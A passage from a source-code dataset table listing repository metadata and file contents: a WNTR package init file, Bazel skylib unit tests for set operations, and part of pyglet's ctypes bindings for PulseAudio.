hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a48c58e9f1de07ae64acb88a2d38d018da133288
| 525
|
py
|
Python
|
wntr/__init__.py
|
algchyhao/WNTR
|
dd4db188a8641a4da16cf80a1557c908fa48c17d
|
[
"BSD-3-Clause"
] | null | null | null |
wntr/__init__.py
|
algchyhao/WNTR
|
dd4db188a8641a4da16cf80a1557c908fa48c17d
|
[
"BSD-3-Clause"
] | null | null | null |
wntr/__init__.py
|
algchyhao/WNTR
|
dd4db188a8641a4da16cf80a1557c908fa48c17d
|
[
"BSD-3-Clause"
] | null | null | null |
from wntr import epanet
from wntr import network
from wntr import morph
from wntr import metrics
from wntr import sim
from wntr import scenario
from wntr import graphics
from wntr import utils
__version__ = '0.1.7'
__copyright__ = """Copyright 2015-2019 National Technology & Engineering
Solutions of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525
with NTESS, the U.S. Government retains certain rights in this software."""
__license__ = "Revised BSD License"
from wntr.utils.logger import start_logging
| 27.631579
| 75
| 0.794286
|
127167355cbe343d0f2cc6796ef9bd9083343d76
| 42
|
py
|
Python
|
test_pyramids/__init__.py
|
leomauro/pyramids
|
4f7a8e97e13a5ee0b037dc528e5ba72f31ac36e5
|
[
"MIT"
] | 9
|
2015-09-04T22:33:40.000Z
|
2019-04-11T14:05:11.000Z
|
test_pyramids/__init__.py
|
leomauro/pyramids
|
4f7a8e97e13a5ee0b037dc528e5ba72f31ac36e5
|
[
"MIT"
] | 2
|
2015-09-04T22:31:44.000Z
|
2017-07-29T04:11:53.000Z
|
test_pyramids/__init__.py
|
hosford42/pyramids
|
4f7a8e97e13a5ee0b037dc528e5ba72f31ac36e5
|
[
"MIT"
] | 3
|
2015-10-14T12:41:26.000Z
|
2022-01-08T19:43:47.000Z
|
"""Test suite for the Pyramids parser."""
| 21
| 41
| 0.690476
|
7f84260de4df365fe7b095a1829bc82091a286e4
| 5,500
|
bzl
|
Python
|
tests/sets_tests.bzl
|
laszlocsomor/bazel-skylib
|
f4a2bae427c4958af834c34624767b0144f7ab12
|
[
"Apache-2.0"
] | null | null | null |
tests/sets_tests.bzl
|
laszlocsomor/bazel-skylib
|
f4a2bae427c4958af834c34624767b0144f7ab12
|
[
"Apache-2.0"
] | null | null | null |
tests/sets_tests.bzl
|
laszlocsomor/bazel-skylib
|
f4a2bae427c4958af834c34624767b0144f7ab12
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for sets.bzl."""
load("//lib:sets.bzl", "sets")
load("//lib:unittest.bzl", "asserts", "unittest")
def _is_equal_test(ctx):
"""Unit tests for sets.is_equal."""
# Note that if this test fails, the results for the other `sets` tests will
# be inconclusive because they use `asserts.set_equals`, which in turn calls
# `sets.is_equal`.
env = unittest.begin(ctx)
asserts.true(env, sets.is_equal([], []))
asserts.false(env, sets.is_equal([], [1]))
asserts.false(env, sets.is_equal([1], []))
asserts.true(env, sets.is_equal([1], [1]))
asserts.false(env, sets.is_equal([1], [1, 2]))
asserts.false(env, sets.is_equal([1], [2]))
asserts.false(env, sets.is_equal([1], depset([1, 2])))
# Verify that the implementation is not using == on the sets directly.
asserts.true(env, sets.is_equal(depset([1]), depset([1])))
# If passing a list, verify that duplicate elements are ignored.
asserts.true(env, sets.is_equal([1, 1], [1]))
unittest.end(env)
is_equal_test = unittest.make(_is_equal_test)
def _is_subset_test(ctx):
"""Unit tests for sets.is_subset."""
env = unittest.begin(ctx)
asserts.true(env, sets.is_subset([], []))
asserts.true(env, sets.is_subset([], [1]))
asserts.false(env, sets.is_subset([1], []))
asserts.true(env, sets.is_subset([1], [1]))
asserts.true(env, sets.is_subset([1], [1, 2]))
asserts.false(env, sets.is_subset([1], [2]))
asserts.true(env, sets.is_subset([1], depset([1, 2])))
# If passing a list, verify that duplicate elements are ignored.
asserts.true(env, sets.is_subset([1, 1], [1, 2]))
unittest.end(env)
is_subset_test = unittest.make(_is_subset_test)
def _disjoint_test(ctx):
"""Unit tests for sets.disjoint."""
env = unittest.begin(ctx)
asserts.true(env, sets.disjoint([], []))
asserts.true(env, sets.disjoint([], [1]))
asserts.true(env, sets.disjoint([1], []))
asserts.false(env, sets.disjoint([1], [1]))
asserts.false(env, sets.disjoint([1], [1, 2]))
asserts.true(env, sets.disjoint([1], [2]))
asserts.true(env, sets.disjoint([1], depset([2])))
# If passing a list, verify that duplicate elements are ignored.
asserts.false(env, sets.disjoint([1, 1], [1, 2]))
unittest.end(env)
disjoint_test = unittest.make(_disjoint_test)
def _intersection_test(ctx):
"""Unit tests for sets.intersection."""
env = unittest.begin(ctx)
asserts.set_equals(env, [], sets.intersection([], []))
asserts.set_equals(env, [], sets.intersection([], [1]))
asserts.set_equals(env, [], sets.intersection([1], []))
asserts.set_equals(env, [1], sets.intersection([1], [1]))
asserts.set_equals(env, [1], sets.intersection([1], [1, 2]))
asserts.set_equals(env, [], sets.intersection([1], [2]))
asserts.set_equals(env, [1], sets.intersection([1], depset([1])))
# If passing a list, verify that duplicate elements are ignored.
asserts.set_equals(env, [1], sets.intersection([1, 1], [1, 2]))
unittest.end(env)
intersection_test = unittest.make(_intersection_test)
def _union_test(ctx):
"""Unit tests for sets.union."""
env = unittest.begin(ctx)
asserts.set_equals(env, [], sets.union())
asserts.set_equals(env, [1], sets.union([1]))
asserts.set_equals(env, [], sets.union([], []))
asserts.set_equals(env, [1], sets.union([], [1]))
asserts.set_equals(env, [1], sets.union([1], []))
asserts.set_equals(env, [1], sets.union([1], [1]))
asserts.set_equals(env, [1, 2], sets.union([1], [1, 2]))
asserts.set_equals(env, [1, 2], sets.union([1], [2]))
asserts.set_equals(env, [1], sets.union([1], depset([1])))
# If passing a list, verify that duplicate elements are ignored.
asserts.set_equals(env, [1, 2], sets.union([1, 1], [1, 2]))
unittest.end(env)
union_test = unittest.make(_union_test)
def _difference_test(ctx):
"""Unit tests for sets.difference."""
env = unittest.begin(ctx)
asserts.set_equals(env, [], sets.difference([], []))
asserts.set_equals(env, [], sets.difference([], [1]))
asserts.set_equals(env, [1], sets.difference([1], []))
asserts.set_equals(env, [], sets.difference([1], [1]))
asserts.set_equals(env, [], sets.difference([1], [1, 2]))
asserts.set_equals(env, [1], sets.difference([1], [2]))
asserts.set_equals(env, [], sets.difference([1], depset([1])))
# If passing a list, verify that duplicate elements are ignored.
asserts.set_equals(env, [2], sets.difference([1, 2], [1, 1]))
unittest.end(env)
difference_test = unittest.make(_difference_test)
def sets_test_suite():
"""Creates the test targets and test suite for sets.bzl tests."""
unittest.suite(
"sets_tests",
disjoint_test,
intersection_test,
is_equal_test,
is_subset_test,
difference_test,
union_test,
)
| 35.714286
| 80
| 0.651273
|
981560558743d6475be801ad127fb7ab3420f72f
| 118,322
|
py
|
Python
|
venv/Lib/site-packages/pyglet/media/drivers/pulse/lib_pulseaudio.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
venv/Lib/site-packages/pyglet/media/drivers/pulse/lib_pulseaudio.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
venv/Lib/site-packages/pyglet/media/drivers/pulse/lib_pulseaudio.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2020 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Wrapper for pulse
Generated with:
tools/genwrappers.py pulseaudio
Do not modify this file.
IMPORTANT: struct_timeval is incorrectly parsed by tools/genwrappers.py and
was manually edited in this file.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import ctypes
from ctypes import *
import pyglet.lib
_lib = pyglet.lib.load_library('pulse')
_int_types = (c_int16, c_int32)
if hasattr(ctypes, 'c_int64'):
# Some builds of ctypes apparently do not have c_int64
# defined; it's a pretty good bet that these builds do not
# have 64-bit pointers.
_int_types += (ctypes.c_int64,)
for t in _int_types:
if sizeof(t) == sizeof(c_size_t):
c_ptrdiff_t = t
class c_void(Structure):
# c_void_p is a buggy return type, converting to int, so
# POINTER(None) == c_void_p is actually written as
# POINTER(c_void), so it can be treated as a real pointer.
_fields_ = [('dummy', c_int)]
# /usr/include/pulse/version.h:40
pa_get_library_version = _lib.pa_get_library_version
pa_get_library_version.restype = c_char_p
pa_get_library_version.argtypes = []
PA_API_VERSION = 12 # /usr/include/pulse/version.h:46
PA_PROTOCOL_VERSION = 30 # /usr/include/pulse/version.h:50
PA_MAJOR = 6 # /usr/include/pulse/version.h:53
PA_MINOR = 0 # /usr/include/pulse/version.h:56
PA_MICRO = 0 # /usr/include/pulse/version.h:59
PA_CHANNELS_MAX = 32 # /usr/include/pulse/sample.h:128
PA_RATE_MAX = 192000 # /usr/include/pulse/sample.h:131
enum_pa_sample_format = c_int
PA_SAMPLE_U8 = 0
PA_SAMPLE_ALAW = 1
PA_SAMPLE_ULAW = 2
PA_SAMPLE_S16LE = 3
PA_SAMPLE_S16BE = 4
PA_SAMPLE_FLOAT32LE = 5
PA_SAMPLE_FLOAT32BE = 6
PA_SAMPLE_S32LE = 7
PA_SAMPLE_S32BE = 8
PA_SAMPLE_S24LE = 9
PA_SAMPLE_S24BE = 10
PA_SAMPLE_S24_32LE = 11
PA_SAMPLE_S24_32BE = 12
PA_SAMPLE_MAX = 13
PA_SAMPLE_INVALID = -1
pa_sample_format_t = enum_pa_sample_format # /usr/include/pulse/sample.h:179
class struct_pa_sample_spec(Structure):
__slots__ = [
'format',
'rate',
'channels',
]
struct_pa_sample_spec._fields_ = [
('format', pa_sample_format_t),
('rate', c_uint32),
('channels', c_uint8),
]
pa_sample_spec = struct_pa_sample_spec # /usr/include/pulse/sample.h:257
pa_usec_t = c_uint64 # /usr/include/pulse/sample.h:260
# /usr/include/pulse/sample.h:263
pa_bytes_per_second = _lib.pa_bytes_per_second
pa_bytes_per_second.restype = c_size_t
pa_bytes_per_second.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:266
pa_frame_size = _lib.pa_frame_size
pa_frame_size.restype = c_size_t
pa_frame_size.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:269
pa_sample_size = _lib.pa_sample_size
pa_sample_size.restype = c_size_t
pa_sample_size.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:273
pa_sample_size_of_format = _lib.pa_sample_size_of_format
pa_sample_size_of_format.restype = c_size_t
pa_sample_size_of_format.argtypes = [pa_sample_format_t]
# /usr/include/pulse/sample.h:278
pa_bytes_to_usec = _lib.pa_bytes_to_usec
pa_bytes_to_usec.restype = pa_usec_t
pa_bytes_to_usec.argtypes = [c_uint64, POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:283
pa_usec_to_bytes = _lib.pa_usec_to_bytes
pa_usec_to_bytes.restype = c_size_t
pa_usec_to_bytes.argtypes = [pa_usec_t, POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:288
pa_sample_spec_init = _lib.pa_sample_spec_init
pa_sample_spec_init.restype = POINTER(pa_sample_spec)
pa_sample_spec_init.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:291
#pa_sample_format_valid = _lib.pa_sample_format_valid
#pa_sample_format_valid.restype = c_int
#pa_sample_format_valid.argtypes = [c_uint]
# /usr/include/pulse/sample.h:294
#pa_sample_rate_valid = _lib.pa_sample_rate_valid
#pa_sample_rate_valid.restype = c_int
#pa_sample_rate_valid.argtypes = [c_uint32]
# /usr/include/pulse/sample.h:298
#pa_channels_valid = _lib.pa_channels_valid
#pa_channels_valid.restype = c_int
#pa_channels_valid.argtypes = [c_uint8]
# /usr/include/pulse/sample.h:301
pa_sample_spec_valid = _lib.pa_sample_spec_valid
pa_sample_spec_valid.restype = c_int
pa_sample_spec_valid.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:304
pa_sample_spec_equal = _lib.pa_sample_spec_equal
pa_sample_spec_equal.restype = c_int
pa_sample_spec_equal.argtypes = [POINTER(pa_sample_spec), POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:307
pa_sample_format_to_string = _lib.pa_sample_format_to_string
pa_sample_format_to_string.restype = c_char_p
pa_sample_format_to_string.argtypes = [pa_sample_format_t]
# /usr/include/pulse/sample.h:310
pa_parse_sample_format = _lib.pa_parse_sample_format
pa_parse_sample_format.restype = pa_sample_format_t
pa_parse_sample_format.argtypes = [c_char_p]
PA_SAMPLE_SPEC_SNPRINT_MAX = 32 # /usr/include/pulse/sample.h:317
# /usr/include/pulse/sample.h:320
pa_sample_spec_snprint = _lib.pa_sample_spec_snprint
pa_sample_spec_snprint.restype = c_char_p
pa_sample_spec_snprint.argtypes = [c_char_p, c_size_t, POINTER(pa_sample_spec)]
PA_BYTES_SNPRINT_MAX = 11 # /usr/include/pulse/sample.h:327
# /usr/include/pulse/sample.h:330
pa_bytes_snprint = _lib.pa_bytes_snprint
pa_bytes_snprint.restype = c_char_p
pa_bytes_snprint.argtypes = [c_char_p, c_size_t, c_uint]
# /usr/include/pulse/sample.h:334
pa_sample_format_is_le = _lib.pa_sample_format_is_le
pa_sample_format_is_le.restype = c_int
pa_sample_format_is_le.argtypes = [pa_sample_format_t]
# /usr/include/pulse/sample.h:338
pa_sample_format_is_be = _lib.pa_sample_format_is_be
pa_sample_format_is_be.restype = c_int
pa_sample_format_is_be.argtypes = [pa_sample_format_t]
enum_pa_context_state = c_int
PA_CONTEXT_UNCONNECTED = 0
PA_CONTEXT_CONNECTING = 1
PA_CONTEXT_AUTHORIZING = 2
PA_CONTEXT_SETTING_NAME = 3
PA_CONTEXT_READY = 4
PA_CONTEXT_FAILED = 5
PA_CONTEXT_TERMINATED = 6
pa_context_state_t = enum_pa_context_state # /usr/include/pulse/def.h:45
enum_pa_stream_state = c_int
PA_STREAM_UNCONNECTED = 0
PA_STREAM_CREATING = 1
PA_STREAM_READY = 2
PA_STREAM_FAILED = 3
PA_STREAM_TERMINATED = 4
pa_stream_state_t = enum_pa_stream_state # /usr/include/pulse/def.h:74
enum_pa_operation_state = c_int
PA_OPERATION_RUNNING = 0
PA_OPERATION_DONE = 1
PA_OPERATION_CANCELLED = 2
pa_operation_state_t = enum_pa_operation_state # /usr/include/pulse/def.h:102
enum_pa_context_flags = c_int
PA_CONTEXT_NOFLAGS = 0
PA_CONTEXT_NOAUTOSPAWN = 1
PA_CONTEXT_NOFAIL = 2
pa_context_flags_t = enum_pa_context_flags # /usr/include/pulse/def.h:122
enum_pa_direction = c_int
PA_DIRECTION_OUTPUT = 1
PA_DIRECTION_INPUT = 2
pa_direction_t = enum_pa_direction # /usr/include/pulse/def.h:137
enum_pa_device_type = c_int
PA_DEVICE_TYPE_SINK = 0
PA_DEVICE_TYPE_SOURCE = 1
pa_device_type_t = enum_pa_device_type # /usr/include/pulse/def.h:148
enum_pa_stream_direction = c_int
PA_STREAM_NODIRECTION = 0
PA_STREAM_PLAYBACK = 1
PA_STREAM_RECORD = 2
PA_STREAM_UPLOAD = 3
pa_stream_direction_t = enum_pa_stream_direction # /usr/include/pulse/def.h:161
enum_pa_stream_flags = c_int
PA_STREAM_NOFLAGS = 0
PA_STREAM_START_CORKED = 1
PA_STREAM_INTERPOLATE_TIMING = 2
PA_STREAM_NOT_MONOTONIC = 4
PA_STREAM_AUTO_TIMING_UPDATE = 8
PA_STREAM_NO_REMAP_CHANNELS = 16
PA_STREAM_NO_REMIX_CHANNELS = 32
PA_STREAM_FIX_FORMAT = 64
PA_STREAM_FIX_RATE = 128
PA_STREAM_FIX_CHANNELS = 256
PA_STREAM_DONT_MOVE = 512
PA_STREAM_VARIABLE_RATE = 1024
PA_STREAM_PEAK_DETECT = 2048
PA_STREAM_START_MUTED = 4096
PA_STREAM_ADJUST_LATENCY = 8192
PA_STREAM_EARLY_REQUESTS = 16384
PA_STREAM_DONT_INHIBIT_AUTO_SUSPEND = 32768
PA_STREAM_START_UNMUTED = 65536
PA_STREAM_FAIL_ON_SUSPEND = 131072
PA_STREAM_RELATIVE_VOLUME = 262144
PA_STREAM_PASSTHROUGH = 524288
pa_stream_flags_t = enum_pa_stream_flags # /usr/include/pulse/def.h:355
class struct_pa_buffer_attr(Structure):
__slots__ = [
'maxlength',
'tlength',
'prebuf',
'minreq',
'fragsize',
]
struct_pa_buffer_attr._fields_ = [
('maxlength', c_uint32),
('tlength', c_uint32),
('prebuf', c_uint32),
('minreq', c_uint32),
('fragsize', c_uint32),
]
pa_buffer_attr = struct_pa_buffer_attr # /usr/include/pulse/def.h:452
enum_pa_error_code = c_int
PA_OK = 0
PA_ERR_ACCESS = 1
PA_ERR_COMMAND = 2
PA_ERR_INVALID = 3
PA_ERR_EXIST = 4
PA_ERR_NOENTITY = 5
PA_ERR_CONNECTIONREFUSED = 6
PA_ERR_PROTOCOL = 7
PA_ERR_TIMEOUT = 8
PA_ERR_AUTHKEY = 9
PA_ERR_INTERNAL = 10
PA_ERR_CONNECTIONTERMINATED = 11
PA_ERR_KILLED = 12
PA_ERR_INVALIDSERVER = 13
PA_ERR_MODINITFAILED = 14
PA_ERR_BADSTATE = 15
PA_ERR_NODATA = 16
PA_ERR_VERSION = 17
PA_ERR_TOOLARGE = 18
PA_ERR_NOTSUPPORTED = 19
PA_ERR_UNKNOWN = 20
PA_ERR_NOEXTENSION = 21
PA_ERR_OBSOLETE = 22
PA_ERR_NOTIMPLEMENTED = 23
PA_ERR_FORKED = 24
PA_ERR_IO = 25
PA_ERR_BUSY = 26
PA_ERR_MAX = 27
pa_error_code_t = enum_pa_error_code # /usr/include/pulse/def.h:484
enum_pa_subscription_mask = c_int
PA_SUBSCRIPTION_MASK_NULL = 0
PA_SUBSCRIPTION_MASK_SINK = 1
PA_SUBSCRIPTION_MASK_SOURCE = 2
PA_SUBSCRIPTION_MASK_SINK_INPUT = 4
PA_SUBSCRIPTION_MASK_SOURCE_OUTPUT = 8
PA_SUBSCRIPTION_MASK_MODULE = 16
PA_SUBSCRIPTION_MASK_CLIENT = 32
PA_SUBSCRIPTION_MASK_SAMPLE_CACHE = 64
PA_SUBSCRIPTION_MASK_SERVER = 128
PA_SUBSCRIPTION_MASK_AUTOLOAD = 256
PA_SUBSCRIPTION_MASK_CARD = 512
PA_SUBSCRIPTION_MASK_ALL = 767
pa_subscription_mask_t = enum_pa_subscription_mask # /usr/include/pulse/def.h:554
enum_pa_subscription_event_type = c_int
PA_SUBSCRIPTION_EVENT_SINK = 0
PA_SUBSCRIPTION_EVENT_SOURCE = 1
PA_SUBSCRIPTION_EVENT_SINK_INPUT = 2
PA_SUBSCRIPTION_EVENT_SOURCE_OUTPUT = 3
PA_SUBSCRIPTION_EVENT_MODULE = 4
PA_SUBSCRIPTION_EVENT_CLIENT = 5
PA_SUBSCRIPTION_EVENT_SAMPLE_CACHE = 6
PA_SUBSCRIPTION_EVENT_SERVER = 7
PA_SUBSCRIPTION_EVENT_AUTOLOAD = 8
PA_SUBSCRIPTION_EVENT_CARD = 9
PA_SUBSCRIPTION_EVENT_FACILITY_MASK = 15
PA_SUBSCRIPTION_EVENT_NEW = 0
PA_SUBSCRIPTION_EVENT_CHANGE = 16
PA_SUBSCRIPTION_EVENT_REMOVE = 32
PA_SUBSCRIPTION_EVENT_TYPE_MASK = 48
pa_subscription_event_type_t = enum_pa_subscription_event_type # /usr/include/pulse/def.h:605
class struct_pa_timing_info(Structure):
__slots__ = [
'timestamp',
'synchronized_clocks',
'sink_usec',
'source_usec',
'transport_usec',
'playing',
'write_index_corrupt',
'write_index',
'read_index_corrupt',
'read_index',
'configured_sink_usec',
'configured_source_usec',
'since_underrun',
]
class struct_timeval(Structure):
_fields_ = [("tv_sec", c_long),
("tv_usec", c_long)]
struct_pa_timing_info._fields_ = [
('timestamp', struct_timeval),
('synchronized_clocks', c_int),
('sink_usec', pa_usec_t),
('source_usec', pa_usec_t),
('transport_usec', pa_usec_t),
('playing', c_int),
('write_index_corrupt', c_int),
('write_index', c_int64),
('read_index_corrupt', c_int),
('read_index', c_int64),
('configured_sink_usec', pa_usec_t),
('configured_source_usec', pa_usec_t),
('since_underrun', c_int64),
]
pa_timing_info = struct_pa_timing_info # /usr/include/pulse/def.h:725
class struct_pa_spawn_api(Structure):
__slots__ = [
'prefork',
'postfork',
'atfork',
]
struct_pa_spawn_api._fields_ = [
('prefork', POINTER(CFUNCTYPE(None))),
('postfork', POINTER(CFUNCTYPE(None))),
('atfork', POINTER(CFUNCTYPE(None))),
]
pa_spawn_api = struct_pa_spawn_api # /usr/include/pulse/def.h:749
enum_pa_seek_mode = c_int
PA_SEEK_RELATIVE = 0
PA_SEEK_ABSOLUTE = 1
PA_SEEK_RELATIVE_ON_READ = 2
PA_SEEK_RELATIVE_END = 3
pa_seek_mode_t = enum_pa_seek_mode # /usr/include/pulse/def.h:764
enum_pa_sink_flags = c_int
PA_SINK_NOFLAGS = 0
PA_SINK_HW_VOLUME_CTRL = 1
PA_SINK_LATENCY = 2
PA_SINK_HARDWARE = 4
PA_SINK_NETWORK = 8
PA_SINK_HW_MUTE_CTRL = 16
PA_SINK_DECIBEL_VOLUME = 32
PA_SINK_FLAT_VOLUME = 64
PA_SINK_DYNAMIC_LATENCY = 128
PA_SINK_SET_FORMATS = 256
pa_sink_flags_t = enum_pa_sink_flags # /usr/include/pulse/def.h:829
enum_pa_sink_state = c_int
PA_SINK_INVALID_STATE = -1
PA_SINK_RUNNING = 0
PA_SINK_IDLE = 1
PA_SINK_SUSPENDED = 2
PA_SINK_INIT = -2
PA_SINK_UNLINKED = -3
pa_sink_state_t = enum_pa_sink_state # /usr/include/pulse/def.h:875
enum_pa_source_flags = c_int
PA_SOURCE_NOFLAGS = 0
PA_SOURCE_HW_VOLUME_CTRL = 1
PA_SOURCE_LATENCY = 2
PA_SOURCE_HARDWARE = 4
PA_SOURCE_NETWORK = 8
PA_SOURCE_HW_MUTE_CTRL = 16
PA_SOURCE_DECIBEL_VOLUME = 32
PA_SOURCE_DYNAMIC_LATENCY = 64
PA_SOURCE_FLAT_VOLUME = 128
pa_source_flags_t = enum_pa_source_flags # /usr/include/pulse/def.h:946
enum_pa_source_state = c_int
PA_SOURCE_INVALID_STATE = -1
PA_SOURCE_RUNNING = 0
PA_SOURCE_IDLE = 1
PA_SOURCE_SUSPENDED = 2
PA_SOURCE_INIT = -2
PA_SOURCE_UNLINKED = -3
pa_source_state_t = enum_pa_source_state # /usr/include/pulse/def.h:991
pa_free_cb_t = CFUNCTYPE(None, POINTER(None)) # /usr/include/pulse/def.h:1014
enum_pa_port_available = c_int
PA_PORT_AVAILABLE_UNKNOWN = 0
PA_PORT_AVAILABLE_NO = 1
PA_PORT_AVAILABLE_YES = 2
pa_port_available_t = enum_pa_port_available # /usr/include/pulse/def.h:1040
class struct_pa_mainloop_api(Structure):
__slots__ = [
]
struct_pa_mainloop_api._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_mainloop_api(Structure):
__slots__ = [
]
struct_pa_mainloop_api._fields_ = [
('_opaque_struct', c_int)
]
pa_mainloop_api = struct_pa_mainloop_api # /usr/include/pulse/mainloop-api.h:47
enum_pa_io_event_flags = c_int
PA_IO_EVENT_NULL = 0
PA_IO_EVENT_INPUT = 1
PA_IO_EVENT_OUTPUT = 2
PA_IO_EVENT_HANGUP = 4
PA_IO_EVENT_ERROR = 8
pa_io_event_flags_t = enum_pa_io_event_flags # /usr/include/pulse/mainloop-api.h:56
class struct_pa_io_event(Structure):
__slots__ = [
]
struct_pa_io_event._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_io_event(Structure):
__slots__ = [
]
struct_pa_io_event._fields_ = [
('_opaque_struct', c_int)
]
pa_io_event = struct_pa_io_event # /usr/include/pulse/mainloop-api.h:59
pa_io_event_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_io_event), c_int, pa_io_event_flags_t, POINTER(None)) # /usr/include/pulse/mainloop-api.h:61
pa_io_event_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_io_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:63
class struct_pa_time_event(Structure):
__slots__ = [
]
struct_pa_time_event._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_time_event(Structure):
__slots__ = [
]
struct_pa_time_event._fields_ = [
('_opaque_struct', c_int)
]
pa_time_event = struct_pa_time_event # /usr/include/pulse/mainloop-api.h:66
pa_time_event_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_time_event), POINTER(struct_timeval), POINTER(None)) # /usr/include/pulse/mainloop-api.h:68
pa_time_event_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_time_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:70
class struct_pa_defer_event(Structure):
__slots__ = [
]
struct_pa_defer_event._fields_ = [
('_opaque_struct', c_int)
]
class struct_pa_defer_event(Structure):
__slots__ = [
]
struct_pa_defer_event._fields_ = [
('_opaque_struct', c_int)
]
pa_defer_event = struct_pa_defer_event # /usr/include/pulse/mainloop-api.h:73
pa_defer_event_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_defer_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:75
pa_defer_event_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_defer_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:77
# /usr/include/pulse/mainloop-api.h:120
pa_mainloop_api_once = _lib.pa_mainloop_api_once
pa_mainloop_api_once.restype = None
pa_mainloop_api_once.argtypes = [POINTER(pa_mainloop_api), CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(None)), POINTER(None)]
enum_pa_channel_position = c_int
PA_CHANNEL_POSITION_INVALID = -1
PA_CHANNEL_POSITION_MONO = 0
PA_CHANNEL_POSITION_FRONT_LEFT = 1
PA_CHANNEL_POSITION_FRONT_RIGHT = 2
PA_CHANNEL_POSITION_FRONT_CENTER = 3
PA_CHANNEL_POSITION_LEFT = 0
PA_CHANNEL_POSITION_RIGHT = 0
PA_CHANNEL_POSITION_CENTER = 0
PA_CHANNEL_POSITION_REAR_CENTER = 1
